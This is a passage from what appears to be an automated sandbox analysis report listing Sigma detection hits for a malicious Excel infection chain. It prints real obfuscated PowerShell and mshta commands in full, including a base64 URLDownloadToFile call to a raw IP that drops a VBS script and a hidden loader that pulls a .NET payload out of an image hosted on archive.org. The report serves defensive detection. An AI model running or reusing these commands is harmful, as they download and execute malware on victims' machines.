JbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQ
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3236, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3504, ProcessName: mshta.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", ProcessId: 3720, ProcessName: csc.exe
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 95.217.202.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3236, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS
                Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 4064, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo", ProcessId: 816, ProcessName: RegAsm.exe
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3236, Protocol: tcp, SourceIp: 95.217.202.210, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c